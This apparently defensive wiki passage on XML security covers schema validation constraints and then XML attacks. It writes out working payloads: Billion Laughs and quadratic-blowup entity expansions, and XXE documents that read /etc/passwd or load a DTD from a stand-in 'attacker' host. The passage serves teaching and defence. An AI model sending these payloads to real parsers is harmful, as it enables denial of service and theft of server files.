Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an assertion disallowing the number zero:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:assertion test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;unbounded&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an unbounded value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
•	Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
•	Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER LARGENAME1=&amp;quot;LARGEVALUE&amp;quot; LARGENAME2=&amp;quot; LARGEVALUE&amp;quot; LARGENAME3=&amp;quot; LARGEVALUE&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE includeme [&lt;br /&gt;
  &amp;lt;!ENTITY file SYSTEM &amp;quot;http://attacker/huge.xml&amp;quot; &amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;file;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy . &lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
    &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:ENVELOPE&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output. &lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY %xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
